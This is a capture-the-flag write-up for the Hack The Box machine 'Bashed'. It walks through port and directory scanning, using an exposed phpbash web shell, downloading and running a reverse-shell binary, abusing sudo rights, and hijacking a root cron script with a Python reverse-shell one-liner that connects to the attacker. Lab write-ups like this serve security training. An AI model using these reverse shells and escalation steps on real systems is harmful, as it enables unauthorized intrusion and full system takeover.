HTB: Bashed


I run nmap and found the port 80 open.

❯ ports=$(nmap -p- -T4 -Pn -n $(gettarget) | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

❯ echo $ports 

❯ nmap -sC -sV -p$ports -Pn 
Starting Nmap 7.92 ( ) at 2022-05-08 18:15 BST
Nmap scan report for
Host is up (0.048s latency).

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds

The web appears to be the only service, so I go to check it:

Interesting, it looks like this server has uploaded a file called “phpbash”, if we click on the “phpbash” title, it takes us to another page with a link to the “phpbash” GitHub repository:

The page tells us that the “phpbash” is developed on this exact server, and the GitHub description says “phpbash is a semi-interactive PHP shell compressed into a single file”. If the “phpbash” file is really on this server could be very useful as a foothold.

User flag

I tried a few different URL router trying to find the phpbash file, but without success, so I used gobuster to scan for directories, and I found some interesting ones:

❯ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2022/05/08 18:31:00 Starting gobuster in directory enumeration mode
/images               (Status: 301) [Size: 317] [-->]
/uploads              (Status: 301) [Size: 318] [-->]
/php                  (Status: 301) [Size: 314] [-->]    
/css                  (Status: 301) [Size: 314] [-->]    
/dev                  (Status: 301) [Size: 314] [-->]    
/js                   (Status: 301) [Size: 313] [-->]     
/fonts                (Status: 301) [Size: 316] [-->]

I tried some of the directories, and finally found the phpbash shell on “”:

I made a quick enumeration and found the flag on the “/home/arrexel/” directory, luckily for me the user.txt file have read permissions to “others”, so I was able to read it.

Root flag

First I created a reverse shell, just for commodity. I tried a bash reverse shell, but without success, so I ended up downloading a C reverse shell and uploaded the compiled binary to the target:

❯ git clone

❯ cd c-reverse-shell

# the repo includes a script to quickly change the ip and port, so we don't need to edit the code
❯ ./ 4444

# now compile!
❯ make

❯ python3 -m http.server 8080

I downloaded the binary on the target and executed it:

www-data@bashed:/dev/shm# wget
# chmod +x doesn't work
www-data@bashed:/dev/shm# chmod 711 reverse.elf
www-data@bashed:/dev/shm# ./reverse.elf

I upgraded the shell:

❯ nc -lvvnp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 54798

python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@bashed:/dev/shm$ export TERM=xterm
www-data@bashed:/dev/shm$ ^Z

❯ stty raw -echo; fg


We are ready, time for upload the file for a quick enumeration.

I found something interesting:

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

I can run commands as the “scriptmanager” user, so let’s open a bash session with that user:

www-data@bashed:/dev/shm$ sudo -u scriptmanager /bin/bash

I run again as scriptmanager user, to see what we can do with this user. I found that the scriptmanager user owns a directory called “scripts” on “/”:

╔══════════╣ Unexpected in root
╔══════════╣ Modified interesting files in the last 5mins (limit 100)

It contains two files:

scriptmanager@bashed:/dev/shm$ ls -la /scripts/
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017
-rw-r--r--  1 root          root            12 May  8 10:17 test.txt

According to, the “test.txt” file was modified in the last 5 minutes, that’s strange.

If we take a look at the “” and “test.txt” files, we notice that “test.txt” is a file created by the script “”. So, if “test.txt” was modified in the last 5 minutes and it’s a file that “” creates, we can assume “” is running on a cron, probably by root because is the owner of the “test.txt” file.

I modified the “” file with nano, so the script now contains a python reverse shell, so now I only have to listen with netcat and wait, and the next time root executes “” I will get the reverse shell as root.

scriptmanager@bashed:/scripts$ cat 
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")

After waiting a few seconds I got the reverse shell:

❯ nc -lvvnp 5555
listening on [any] 5555 ...
connect to [] from (UNKNOWN) [] 37980
# whoami

And that’s all! I’m root.


Scroll to Top